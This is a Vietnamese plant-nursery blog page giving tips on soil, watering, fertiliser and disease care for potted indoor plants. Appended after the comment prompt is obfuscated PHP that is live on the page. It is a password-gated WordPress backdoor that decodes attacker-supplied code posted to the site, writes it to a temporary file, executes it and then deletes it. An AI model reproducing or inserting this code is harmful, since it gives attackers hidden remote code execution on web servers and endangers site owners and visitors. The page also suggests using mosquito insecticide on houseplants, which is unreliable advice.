Chăm sóc cây cảnh trong nhà xanh tươi mang lộc cho gia đình

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây cảnh là thú vui của nhiều người. Nhất là ở các gia đình trong thành phố, không có nhiều không gian, bắt buộc phải trồng cây cảnh trong chậu. Diện tích nhỏ, lượng đất và dinh dưỡng cho cây không nhiều là những điều bất lợi cho việc trưởng thành của cây.

Việc nắm được các kỹ thuật trồng cây sẽ là những giải pháp để giúp ta có được chậu cây tươi tốt.

Hãy cùng Vườn cây Hòa Bình tìm hiểu cách chăm sóc cây cảnh trong chậu nhàn tênh nhé!

Chuẩn bị nguồn đất chất lượng

Đầu tiên, chúng ta cần chuẩn bị một lượng đất đủ, dồi dào dinh dưỡng. Đó là điều kiện tiên quyết để cây có thể tiếp tục phát triển.

Hiện nay đã có rất nhiều cửa hàng cây cảnh bán các loại đất chuyên dụng. Bạn có thể mua các loại đất này, tự pha trộn thêm với rơm hoặc cỏ khô, phân bón. Thêm 1 chút nước rồi trộn đều. Vậy là đã có một hỗn hợp đất hữu cơ cho cây cảnh.

Sau khi bố trí được 1 vị trí trồng cây thích hợp trong chậu, hãy lấp kín các lỗ hổng xung quanh, vỗ nhẹ để chúng liên kết lại với nhau.

Lưu ý là không nên lấp đất quá chặt hay quá hổng, quá nhiều sẽ ảnh hưởng đến lượng nước và khí oxi nuôi cây có thể thâm nhập vào.

Lượng đất cho là vừa phải sẽ cách miệng chậu từ 1-3cm tùy độ rộng của chậu.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

>>> Xem thêm: Mua giống cây, dụng cụ trồng cây cảnh tại Vườn cây Hòa Bình

Lượng nước tiêu chuẩn cho cây cảnh

Với những người mới trồng cây, họ thường có câu hỏi: Cây cảnh tưới nước như thế nào? Tưới bao nhiêu nước là đủ cho cây cảnh?

Sẽ không có 1 câu hỏi chính xác và cụ thể cho mọi trường hợp. Tùy vào thời tiết, loại cây, khả năng giữ nước của đất mà sẽ có lượng nước cần thiết.

Chẳng hạn,  các cây ngậm nước như cây xương rồng, nha đam không được tưới nhiều nước. Cây sẽ dễ úng mà chết. Hoặc các loại cây trồng trong nhà cũng không cần tưới nhiều nước.

Nhìn chung, khi nào thấy đất khô, bề mặt săn lại thì tưới nước là được.

Các gia đình nên chuẩn bị bình tưới nước cho cây cảnh. Là loại bình phun nước, có thể kết hợp phun thuốc sâu, phân bón… 

Mùa hè sẽ tiến hành tưới nước nhiều hơn mùa đông hanh khô. Việc tưới nước đúng, đủ sẽ cấp đủ ẩm, làm sạch lá cây và rất có lợi cho quá trình hô hấp, quang hợp của cây.

Tưới nhiều nước không hoàn toàn là đúng, nó sẽ cuốn trôi lớp dinh dưỡng trên bề mặt đất. Cũng chính là nguồn thức ăn của cây trồng.

Một mẹo đơn giản cho người mới bắt đầu là hãy ấn nhẹ tay vào đất trong chậu cây cảnh, nếu tay còn ẩm. Nhấc tay lên còn dính vụn đất tức là đất vẫn còn nước..

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Cách bón phân cho cây trồng

Bón phân là công đoạn rất quan trọng trong việc chăm sóc cây cảnh trong chậu. Nguồn đất không màu mỡ, lớp dinh dưỡng liên tục bị cuốn trôi theo thời gian. Việc bổ sung thêm thức ăn cho cây là điều cần thiết. Là yếu tố quan trọng ảnh hưởng đến quá trình phát triển của cây.

Nếu bón phân quá nhiều, cây phát triển quá mức mất dáng thế, phá thế. Còn nếu bón quá ít, cây cảnh sẽ bị còi cọc, chết cành, ít lá non mọc và nhiều ảnh hưởng khác.

Theo những kinh nghiệm tại Vườn cây Hòa Bình, nên bón phân khoảng nửa tháng một. Chỉ bón phân cây cảnh với tỉ lệ 5% so với lượng đất.

Có 1 số loại nước thường được tưới để bổ sung dinh dưỡng cho cây. Nước vo gạo là một ví dụ, rất tốt cho cây cảnh mà lại an toàn, cây không bị ngộp chất dịnh dưỡng.

>>> Xem thêm: Các loại cây trồng để bàn trang trí dịp Tết đón khách

Phòng bệnh hơn chữa bệnh

Cây cảnh trong chậu chủ yếu được trồng trong nhà, tiếp xúc gần với các thành viên trong gia đình. 

Vì vậy, không được dùng các loại thuốc trừ sâu dùng trong nông nghiệp. Thay vì thế, nhiều người sử dụng thuốc diệt muỗi để trừ sâu bệnh.

Khi cây được tiếp xúc với ánh sáng tự nhiên, không khí trong lành cùng với nguồn đất sạch, chúng luôn được khỏe mạnh.

Vì vậy, để phòng bệnh cho cây cảnh, nên thường xuyên cho chúng tắm nắng ngoài trời. Nhất là vào mùa đông, lượng ánh sáng ban ngày đã giảm mạnh.

Dọn sạch những lá cây và rác vụn xung quanh. Đó chính là nơi mà vi khuẩn sẽ sinh sôi phát triển. Nếu cây bắt đầu có dấu hiệu bị nấm, tức là nguồn đất thiếu vệ sinh và dư thừa quá nhiều nước.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

>>> Xem thêm: Dịch vụ chăm sóc cây xanh chu đáo, chi tiết

Các biện pháp hồi phục 

Khi bắt đầu có hiện tượng cây cảnh khô héo, sâu bệnh, rụng lá… đừng vội bỏ chúng đi. Thay vào đó cần các biện pháp chữa trị kịp thời để chúng phục hồi sức sống.

Một số lưu ý sau sẽ giúp các bạn chăm sóc cây cảnh trong chậu bị bệnh dễ dàng hơn:

-Không cho ánh mặt trời trực tiếp chiếu xạ vào cây. Vì ánh sáng gay gắt sẽ gây bất lợi cho cây.

-Để cây nơi mái hiên mát mẻ, không có gió mạnh, không khí đủ ẩm.

-Không nên thay đất trồng vào lúc này. Cây trồng và bộ rễ của chúng đang rất yếu. Dễ làm đứt, tổn thương chúng lúc này.

-Cắt bỏ các lá vàng úa, khô héo, sâu bệnh.

-Bổ sung đạm vào đất theo đường tưới mỗi tuần 1 lần để bổ sung sức đề kháng cho cây. Cây cảnh cũng giống như con người và các sinh vật sống khác. Có một số chất đóng vai trò quyết định tới sức khỏe của cây.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Vườn cây Hòa Bình đã tổng hợp một số kinh nghiệm trong quá trình trồng cây cảnh. Những cách chăm sóc cây cảnh trong chậu trên khá đơn giản và không yêu cầu đầu tư nhiều chi phí.

Quan trọng là thói quen chăm sóc đều đặn, thường xuyên mỗi ngày.

Thói quen ngày ngày dậy sớm, tập thể dục, tưới cây cảnh, nhặt lá úa… cũng có tác dụng rất tích cực với sức khỏe con người. Điều hòa tâm trí, giải tỏa muộn phiền.

Nếu bạn muốn bắt đầu thói quen trồng cây, hãy tham khảo các loại cây cảnh, cây trong nhà tại Vườn cây Hòa Bình!

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}